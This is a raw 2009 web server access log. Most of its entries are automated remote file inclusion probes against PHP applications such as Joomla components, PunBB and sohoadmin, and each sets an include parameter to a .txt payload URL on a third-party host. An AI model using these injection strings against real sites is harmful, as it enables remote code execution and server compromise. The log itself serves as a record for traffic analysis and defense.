195.137.160.12 - - [08/Sep/2009:06:18:11 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:06:18:11 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:06:18:11 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:06:18:27 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
217.169.210.130 - - [08/Sep/2009:06:18:36 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.76"
217.169.210.130 - - [08/Sep/2009:06:18:36 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
87.139.66.104 - - [08/Sep/2009:06:20:15 -0500] "GET /?APB_rp=http://seoul.nodong.org/bbs/skin/ggambo7002_gallery/mambo?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
87.139.66.104 - - [08/Sep/2009:06:20:16 -0500] "GET /logs/?APB_rp=http://seoul.nodong.org/bbs/skin/ggambo7002_gallery/mambo?? HTTP/1.1" 200 204197 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
195.137.160.12 - - [08/Sep/2009:06:22:59 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:06:26:00 -0500] "GET /index.php?visualizar=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:06:26:00 -0500] "GET /logs/index.php?visualizar=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:06:26:00 -0500] "GET /logs/access_log.1241308800/index.php?visualizar=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:06:26:00 -0500] "GET /logs/access_log.1247443200/index.php?visualizar=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.218.40.180 - - [08/Sep/2009:06:26:52 -0500] "GET /logs//forum/include/common.php?pun_root=http://seoul.nodong.org/bbs/skin/ggambo7002_gallery/mambo?? HTTP/1.1" 404 313 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
211.218.40.180 - - [08/Sep/2009:06:26:52 -0500] "GET //forum/include/common.php?pun_root=http://seoul.nodong.org/bbs/skin/ggambo7002_gallery/mambo?? HTTP/1.1" 404 308 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
195.190.166.35 - - [08/Sep/2009:06:27:20 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 348 "-""libwww-perl/5.65"
195.190.166.35 - - [08/Sep/2009:06:27:20 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
66.90.115.6 - - [08/Sep/2009:06:35:07 -0500] "GET //include/bbs.lib.inc.php?site_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:06:35:12 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:06:35:12 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:06:35:12 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:06:39:30 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:06:39:31 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:06:39:31 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:06:41:34 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:06:41:35 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:06:41:37 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:06:44:14 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:06:45:22 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.190.166.35 - - [08/Sep/2009:06:51:11 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 348 "-""libwww-perl/5.65"
195.190.166.35 - - [08/Sep/2009:06:51:11 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
211.189.18.73 - - [08/Sep/2009:06:51:30 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:06:51:30 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:06:52:05 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:06:52:05 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
65.55.106.162 - - [08/Sep/2009:06:53:03 -0500] "GET /logs/access_log.1241395200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.189.18.73 - - [08/Sep/2009:06:54:57 -0500] "GET /logs/access_log.1240012800%22%20target=%22_blank/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.189.18.73 - - [08/Sep/2009:06:54:57 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.189.18.73 - - [08/Sep/2009:06:54:57 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.189.18.73 - - [08/Sep/2009:06:55:13 -0500] "GET /logs/access_log.1247788800%22%20target=%22_blank/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.189.18.73 - - [08/Sep/2009:06:55:42 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.189.18.73 - - [08/Sep/2009:06:55:42 -0500] "GET /logs/access_log.1240012800%22%20target=%22_blank/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.189.18.73 - - [08/Sep/2009:06:55:42 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.189.18.73 - - [08/Sep/2009:06:55:53 -0500] "GET /logs/access_log.1247788800%22%20target=%22_blank/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
142.46.57.161 - - [08/Sep/2009:07:03:45 -0500] "GET /!scanhttp://www.jesusville.co.kr/bots/error.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
142.46.57.161 - - [08/Sep/2009:07:03:45 -0500] "GET /logs/!scanhttp://www.jesusville.co.kr/bots/error.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.808"
195.137.160.12 - - [08/Sep/2009:07:06:45 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:07:06:45 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:07:06:45 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
209.172.33.230 - - [08/Sep/2009:07:06:59 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
209.172.33.230 - - [08/Sep/2009:07:06:59 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.812"
195.137.160.12 - - [08/Sep/2009:07:07:41 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:07:07:41 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
195.137.160.12 - - [08/Sep/2009:07:07:41 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.194.251.253 - - [08/Sep/2009:07:13:08 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
66.194.251.253 - - [08/Sep/2009:07:13:09 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
211.189.18.73 - - [08/Sep/2009:07:14:03 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:07:14:03 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:07:14:12 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:07:14:12 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:07:14:17 -0500] "GET /logs/access_log.1244764800%22%20target=%22_blank/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
211.189.18.73 - - [08/Sep/2009:07:14:23 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
211.189.18.73 - - [08/Sep/2009:07:14:24 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
211.189.18.73 - - [08/Sep/2009:07:14:34 -0500] "GET /logs/access_log.1244764800%22%20target=%22_blank/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.55.208.123 - - [08/Sep/2009:07:14:34 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.189.18.73 - - [08/Sep/2009:07:14:34 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
211.189.18.73 - - [08/Sep/2009:07:14:34 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.55.208.123 - - [08/Sep/2009:07:14:35 -0500] "GET /logs/access_log.1250985600 HTTP/1.1" 200 558721 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.189.18.73 - - [08/Sep/2009:07:16:10 -0500] "GET /logs/access_log.1242950400%22%20target=%22_blank/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.55.106.157 - - [08/Sep/2009:07:18:02 -0500] "GET /logs/access_log.1144972800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.67.26.40 - - [08/Sep/2009:07:18:16 -0500] "GET /logs/access_log.1236211200/ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
80.67.26.40 - - [08/Sep/2009:07:18:16 -0500] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.67.26.40 - - [08/Sep/2009:07:18:16 -0500] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
80.67.26.40 - - [08/Sep/2009:07:18:16 -0500] "GET /logs/access_log.1237075200/ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:07:18:25 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:07:18:25 -0500] "GET /logs/access_log.1240012800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:07:18:25 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:07:19:14 -0500] "GET /logs/access_log.1241654400/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
219.85.63.226 - - [08/Sep/2009:07:21:54 -0500] "GET /logs//skins/advanced/errors.php?error=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
219.85.63.226 - - [08/Sep/2009:07:21:54 -0500] "GET //skins/advanced/errors.php?error=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
94.136.37.141 - - [08/Sep/2009:07:22:09 -0500] "GET /?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:22:19 -0500] "GET /logs/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 126845 "-""libwww-perl/5.803"
94.136.37.141 - - [08/Sep/2009:07:24:14 -0500] "GET /?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
94.136.37.141 - - [08/Sep/2009:07:24:24 -0500] "GET /logs/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 204197 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
94.136.37.141 - - [08/Sep/2009:07:24:48 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:07:24:48 -0500] "GET /?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:07:24:54 -0500] "GET /logs/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 204197 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
208.80.195.43 - - [08/Sep/2009:07:26:02 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
94.136.37.141 - - [08/Sep/2009:07:27:28 -0500] "GET /?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:07:27:29 -0500] "GET /logs/access_log.1244764800/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.236.47.23 - - [08/Sep/2009:07:27:29 -0500] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:07:27:29 -0500] "GET /logs/access_log.1245542400/ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:07:27:29 -0500] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:07:27:34 -0500] "GET /logs/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 204197 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:07:27:41 -0500] "GET /?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
85.18.236.8 - - [08/Sep/2009:07:27:48 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
85.18.236.8 - - [08/Sep/2009:07:27:48 -0500] "GET //admin/include/lib.module.php?mod_root=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.18.236.8 - - [08/Sep/2009:07:27:48 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:07:27:51 -0500] "GET /logs/?sourcedir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 200 204197 "-""libwww-perl/5.803"
65.55.106.157 - - [08/Sep/2009:07:29:03 -0500] "GET /logs/access_log.1193788800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.140.23.192 - - [08/Sep/2009:07:31:03 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:07:31:03 -0500] "GET /logs/access_log.1240704000//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:07:31:03 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:07:35:56 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:07:35:56 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
222.236.47.23 - - [08/Sep/2009:07:36:20 -0500] "GET /logs/access_log.1236211200/ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:07:36:20 -0500] "GET /logs/access_log.1237075200/ncaster/admin/addons/archive/archive.php?adminfolder=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:07:37:06 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:07:37:06 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:07:40:11 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
211.189.18.73 - - [08/Sep/2009:07:40:11 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
